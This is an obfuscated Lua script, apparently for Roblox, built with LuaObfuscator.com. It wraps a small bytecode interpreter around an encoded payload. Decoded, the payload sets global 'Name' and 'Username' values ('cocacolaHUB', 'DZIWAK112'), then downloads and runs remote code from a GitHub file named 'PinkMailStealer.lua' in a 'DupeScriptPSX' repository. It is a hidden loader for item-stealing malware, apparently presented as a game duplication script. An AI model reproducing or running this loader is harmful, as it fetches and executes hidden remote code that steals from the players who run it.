--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==5) then v16=nil;v16=function(v17,v18,...)local v27=1;local v28;v17=v5(v4(v17,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v81=v3(v1(v29,16));if v28 then local v88=v6(v81,v28);v28=nil;return v88;else return v81;end end end);local function v30(v31,v32,v33)if v33 then local v82=0 -0;local v83;while true do if (v82==(0 + 0)) then v83=(v31/((4 -(2 + 0))^(v32-(1593 -(1100 + 492)))))%((2 + 0)^(((v33-(1 -0)) -(v32-1)) + (1 -0)));return v83-(v83%(1658 -(980 + 677)));end end else local v84=(5 -(1 + 2))^(v32-(1 + 0));return (((v31%(v84 + v84))>=v84) and ((158 -(56 + 101)) -(949 -(449 + 500)))) or (1735 -(1353 + 382));end end local function v34()local v47=v2(v17,v27,v27);v27=v27 + 1;return v47;end local function v35()local v48,v49=v2(v17,v27,v27 + 2);v27=v27 + 2 + 0;return (v49 * (1017 -761)) + v48;end local function v36()local v50,v51,v52,v53=v2(v17,v27,v27 + (555 -(238 + 315)) + 1);v27=v27 + 2 + 2;return (v53 * ((27288924 + 3690168) -14201876)) + (v52 * (10997 + 4469 + 50070)) + (v51 * (485 -229)) + v50;end local function v37()local v54=v36();local v55=v36();local v56=3 -2;local v57=(v30(v55,3 -2,955 -(772 + 163)) * (2^32)) + v54;local v58=v30(v55,54 -33,31);local v59=((v30(v55,1968 -((1953 -(41 + 34)) + 58))==(1 + (0 -0))) and  -(1 + 0)) or (1240 -(1014 + 225));if (v58==(0 -0)) then if (v57==((0 -0) -0)) then return v59 * (0 -0);else local v89=207 -(129 + 78);while true do if (v89==(0 + 0)) then v58=1 + 0;v56=0;break;end end end elseif (v58==2047) then return ((v57==(0 -0)) and (v59 * (1/(0 + 0)))) or (v59 * NaN);end return v9(v59,v58-(2156 -(120 + 119 + 894))) * (v56 + (v57/((1 + 1)^(15 + (852 -(565 + 250))))));end local function v38(v39)local v60=1427 -((2359 -1046) + 114);local v61;local v62;while true do if (v60==(0 -0)) then v61=nil;if  not v39 then v39=v36();if (v39==(0 -0)) then return "";end end v60=1 + 0;end if (v60==1) then v61=v4(v17,v27,(v27 + v39) -((280 + 545) -((1315 -1021) + 530)));v27=v27 + v39;v60=1482 -(51 + 1429);end if (v60==(2 + 1)) then return v7(v62);end if (v60==(3 -1)) then v62={};for v90=457 -(57 + 399), #v61 do v62[v90]=v3(v2(v4(v61,v90,v90)));end v60=222 -(132 + 87);end end end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v63=0;local v64;local v65;local v66;local v67;local v68;local v69;local v70;local v71;while true do if (v63==4) then while true do if (v64~=(0 -0)) then else v65=0 + 0;v66=nil;v64=1 -0;end if (v64==1) then local v102=0 -0;while true do if (v102==(0 -0)) then v67=nil;v68=nil;v102=1722 -(347 + 1374);end if (v102~=1) then else v64=2;break;end end end if (v64~=3) then else v71=nil;while true do local v108=0 -0;local v109;while true do if ((1828 -(735 + 1093))~=v108) then else v109=0;while true do if (v109~=(0 + 0)) then else local v115=0 + 0;while true do if (0==v115) then local v119=53 -(38 + 15);while true do if ((416 -(276 + 139))==v119) then v115=1;break;end if (v119==(0 + 0)) then if (0==v65) then local v141=0;local v142;while true do if (v141~=0) then else v142=0 + 0;while true do if (v142~=(5 -3)) then else v65=1;break;end if ((1 -0)==v142) then v68={};v69={v66,v67,nil,v68};v142=2;end if (v142==(1939 -(1140 + 799))) then local v172=0 + 0;local v173;while true do if (v172~=0) then else v173=0;while true do if (v173~=1) then else v142=1;break;end if (v173==0) then local v183=0 + 0;while true do if ((432 -(393 + 39))~=v183) then else v66={};v67={};v183=1757 -(547 + 1209);end if (v183==1) then v173=1;break;end end end end break;end end end end break;end end end if ((189 -(37 + 150))==v65) then local v143=0;while true do if (v143~=(0 -0)) then else for v162=1 + 0,v36() do local v163=0;local v164;local v165;local v166;while true do if (v163==0) then local v176=0 + 0;while true do if (v176==(1099 -(226 + 873))) then v164=0 + 0;v165=nil;v176=1 + 0;end if (v176~=1) then else v163=2 -1;break;end end end if (1==v163) then v166=nil;while true do if (v164~=(1 -0)) then else while true do if (v165==0) then v166=v34();if (v30(v166,1,1)==0) then local v184=0;local v185;local v186;local v187;while true do if ((0 + 0)==v184) then v185=v30(v166,1284 -(41 + 1241),3);v186=v30(v166,4,6);v184=1;end if (v184~=(3 -1)) then else local v188=0;local v189;while true do if (v188==0) then v189=0;while true do if (v189~=(625 -(126 + 498))) then else v184=2 + 1;break;end if (v189==0) then local v195=0 + 0;while true do if (v195==(2 -1)) then v189=1 -0;break;end if (v195~=0) then else if (v30(v186,2 -1,1 -0)==1) then v187[6 -4]=v71[v187[2]];end if (v30(v186,2,2)==1) then v187[6 -3]=v71[v187[1717 -(435 + 1279)]];end v195=1;end end end end break;end end end if (v184~=(3 + 0)) then else if (v30(v186,3,3)==(2 -1)) then v187[4]=v71[v187[4]];end v66[v162]=v187;break;end if (v184==(192 -(14 + 177))) then local v191=0 -0;while true do if (v191~=1) then else v184=3 -1;break;end if (v191==(0 -0)) then local v194=0 + 0;while true do if (v194==0) then v187={v35(),v35(),nil,nil};if (v185==(0 -0)) then local v196=0;while true do if (v196~=(917 -(379 + 538))) then else v187[1 + 2]=v35();v187[4]=v35();break;end end elseif (v185==(2 -1)) then v187[3]=v36();elseif (v185==(1487 -(956 + 529))) then v187[3]=v36() -((894 -(17 + 875))^16);elseif (v185==3) then local v205=0;local v206;while true do if ((0 -0)~=v205) then else v206=1367 -(147 + 1220);while true do if ((0 -0)==v206) then v187[3]=v36() -((812 -(184 + 626))^(55 -39));v187[4]=v35();break;end end break;end end end v194=1;end if (v194==(1632 -(497 + 1134))) then v191=1;break;end end end end end end end break;end end break;end if (v164~=0) then else local v179=0 -0;local v180;while true do if (v179==(0 -0)) then v180=0 + 0;while true do if (v180==1) then v164=1 + 0;break;end if (v180==(1079 -(13 + 1066))) then v165=965 -(184 + 781);v166=nil;v180=1;end end break;end end end end break;end end end for v167=1,v36() do v67[v167-1]=v42();end v143=1964 -(92 + 1871);end if (v143~=(598 -(370 + 227))) then else local v158=0 -0;local v159;while true do if (v158~=(0 -0)) then else v159=0;while true do if (v159~=(0 + 0)) then else for v181=1397 -(1316 + 80),v36() do v68[v181]=v36();end return v69;end end break;end end end end end v119=1 + 0;end end end if (v115==1) then v109=3 -2;break;end end end if (v109==1) then if (v65==1) then local v116=0;while true do if (1~=v116) then else local v120=0 -0;while true do if ((634 -(440 + 194))==v120) then for v150=1,v70 do local v151=161 -(37 + 124);local v152;local v153;local v154;while true do if (1==v151) then v154=nil;while true do if (v152==1) then if (v153==(870 -(539 + 330))) then v154=v34()~=0;elseif (v153==(2 + 0)) then v154=v37();elseif (v153==3) then v154=v38();end v71[v150]=v154;break;end if (v152==0) then local v178=0 + 0;while true do if (v178==1) then v152=1 + 0;break;end if (v178==0) then v153=v34();v154=nil;v178=1;end end end end break;end if (0==v151) then v152=0;v153=nil;v151=1;end end end v69[8 -5]=v34();v120=76 -(34 + 41);end if (v120==(1 -0)) then v116=1992 -(340 + 1650);break;end end end if ((928 -(797 + 131))~=v116) then else v70=v36();v71={};v116=1 + 0;end if (v116==2) then v65=2;break;end end end break;end end break;end end end break;end if (v64~=(7 -5)) then else local v103=1207 -(586 + 621);while true do if (0~=v103) then else v69=nil;v70=nil;v103=1 + 0;end if (v103~=1) then else v64=3;break;end end end end break;end if (v63~=(0 -0)) then else v64=0;v65=nil;v63=1 -0;end if ((3 -0)==v63) then local v85=0;while true do if (v85~=(1 + 0)) then else v63=4;break;end if ((0 -0)~=v85) then else v70=nil;v71=nil;v85=1 -0;end end end if (v63==(1 + 0)) then local v86=0 + 0;while true do if (v86==0) then v66=nil;v67=nil;v86=1 + 0;end if ((202 -(47 + 154))==v86) then v63=1225 -(167 + 1056);break;end end end if (v63~=2) then else local v87=698 -(462 + 236);while true do if (1==v87) then v63=3;break;end if (v87==(0 + 0)) then v68=nil;v69=nil;v87=1 + 0;end end end end end local function v43(v44,v45,v46)local v72=v44[1];local v73=v44[2];local v74=v44[3];return function(...)local v75=0;local v76;local v77;local v78;local v79;local v80;while true do if (v75==0) then v76=1;v77= -1;v75=1;end if (v75==1) then v78={...};v79=v13("#",...) -1;v75=2;end if (v75==2) then v80=nil;v80=function()local v92=v72;local v93=v73;local v94=v74;local v95=v41;local v96={};local v97={};local v98={};for v104=0,v79 do if (((1450 + 296)>=(359 + 529)) and (v104>=v94)) then v96[v104-v94]=v78[v104 + 1 + 0];else v98[v104]=v78[v104 + (579 -(401 + 177))];end end local v99=(v79-v94) + 1;local v100;local v101;while true do local v105=0 -0;local v106;while true do if ((v105==(1130 -(687 + 443))) or ((4049 -(3482 -(576 + 1159)))<=522)) then v106=503 -(418 + 85);while true do if ((v106==(3 -2)) or (3112<=2394)) then if (((690 + 3180)>=3207) and (v101<=((132 + 89) -(48 + 169)))) then if ((v101<=(1847 -(362 + 1484))) or ((2632 -(1038 + 383))>(5987 -(317 + 739)))) then if ((v101>(0 -0)) or ((70 + 4034)<(1000 + 642))) then v98[v100[2]][v100[1 + 2]]=v100[15 -11];else v98[v100[2 -0]]=v46[v100[1016 -(469 + 105 + 439)]];end elseif ((((20075 -15649) -(709 + 1003))<=(6126 -(302 + 276 + 1310))) and (v101<=(4 -(9 -7)))) then v98[v100[8 -6]]=v100[3 -0]~=0;elseif ((v101>(2 + 1)) or (311==(3756 -(568 + 929 + 448)))) then v76=v100[3 + 0];else v98[v100[2 + 0]]();end elseif ((v101<=(10 -3)) or ((2587 -(592 + 846))<=(1342 -(51 + 832)))) then if (((2617 -1125)<3960) and (v101<=(2 + 3))) then local v126=0;local v127;local v128;while true do if ((v126==0) or (619>=(2023 -(724 + 413)))) then v127=v100[494 -(369 + (524 -(109 + 292)))];v128=v98[v100[3 + 0]];v126=1628 -(468 + 1159);end if ((727>(1419 -(196 + 504))) and (v126==(2 -1))) then v98[v127 + 1 + (1750 -(1025 + 725))]=v128;v98[v127]=v128[v100[1215 -(95 + 1116)]];break;end end elseif (((5248 -1517)<(7530 -(4891 -(83 + 1052)))) and (v101==(1871 -(1451 + 414)))) then v98[v100[2]]=v100[3];else local v132=0;local v133;local v134;while true do if ((v132==(1 -0)) or ((967 + 1776)>=(11934 -7163))) then while true do if (((522 -336)>=(6 + 1 + 40)) and ((0 -(0 + 0))==v133)) then v134=v100[2 + 0];v98[v134]=v98[v134](v14(v98,v134 + 1 + 0,v77));break;end end break;end if (((869 + 705)<2948) and (v132==(0 -0))) then local v155=366 -(107 + 259);while true do if (((1601 + 1026)>=((686 -(92 + 200)) + 201)) and (v155==1)) then v132=1660 -(1236 + 423);break;end if (((12244 -7692)>=((9858 -7289) -(365 + 774))) and (v155==(227 -(142 + 85)))) then v133=0;v134=nil;v155=342 -(72 + 269);end end end end end elseif ((v101<=8) or ((370 + 72)>(2758 + 1864))) then if ((v98[v100[1387 -(669 + 716)]]==v100[704 -((1539 -(967 + 74)) + 202)]) or ((3900 -(490 + 120))>=(7268 -3205))) then v76=v76 + 1;else v76=v100[3 + 0 + 0];end elseif (((3389 -(79 + 447))<(926 + 2183)) and (v101>9)) then local v136=541 -((808 -418) + 151);local v137;local v138;local v139;local v140;while true do if (((8334 -5374)>(3521 -1664)) and ((1857 -(1513 + 342))==v136)) then for v160=v137,v77 do local v161=0;while true do if (((3239 -(1050 + 768))<=(13890 -9203)) and (v161==(0 + 0))) then v140=v140 + (57 -(42 + 14));v98[v160]=v138[v140];break;end end end break;end if ((v136==(1209 -(844 + 365))) or ((115 + 787)==(428 -(53 + 150)))) then local v156=(0 -0) + 0;while true do if (((2926 + 2033)>(967 + 2054)) and ((3 -2)==v156)) then v136=1;break;end if ((137>(2086 -(163 + 1820))) and (0==v156)) then v137=v100[2];v138,v139=v95(v98[v137](v14(v98,v137 + (1848 -(769 + 1078)),v100[1648 -(1166 + 479)])));v156=(1 -0) + 0;end end end if (((13884 -(18011 -7683))<=(795 + 3425)) and (v136==(3 -2))) then local v157=0 + 0;while true do if (((3540 -(176 + 500))<=(731 + 3044)) and (v157==(0 -0))) then v77=(v139 + v137) -(1 + 0);v140=0 + 0;v157=803 -(216 + 586);end if (((4621 -(346 + 1174))<(9927 -6237)) and (v157==(1 + 0))) then v136=2;break;end end end end else do return;end end v76=v76 + (1 -0);break;end if (((12199 -8175)>3930) and (v106==(23 -(17 + 6)))) then local v114=(0 + 0) -(688 -(288 + 400));while true do if (((5818 -(947 + 517))>=(4944 -3675)) and (v114==(1412 -(235 + 1177)))) then v100=v92[v76];v101=v100[4 -3];v114=1 + 0;end if ((v114==(1542 -(404 + 1137))) or (((593 -424) + 677)>=(3077 + 130))) then v106=1745 -(381 + 1363);break;end end end end break;end end end end;v75=3;end if (v75==3) then A,B=v41(v12(v80));if  not A[1] then local v107=v44[4][v76] or "?";error("Script error at ["   .. v107   .. "]:"   .. A[2]);else return v14(A,2,B);end break;end end end;end return v43(v42(),{},v18)(...);end;v16("LOL!0B3O00028O0003023O005F4703043O004E616D65030B3O00636F6361636F6C6148554203083O00557365726E616D65030A3O00445A4957414B2O312O32026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403593O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4F6C69776965724973547279486172642F447570655363726970745053582F6D61696E2F50696E6B4D61696C537465616C65722E6C756100153O0012063O00013O0026083O000800010001002O043O0008000100122O000100023O00300100010003000400122O000100023O0030010001000500060012063O00073O0026083O000100010007002O043O0001000100122O000100083O00122O000200093O00200500020002000A0012060004000B4O0002000500014O000A000200054O000700013O00022O0003000100010001002O043O00140001002O043O000100012O00093O00017O00153O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (2==v0) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==4) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (3==v0) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end
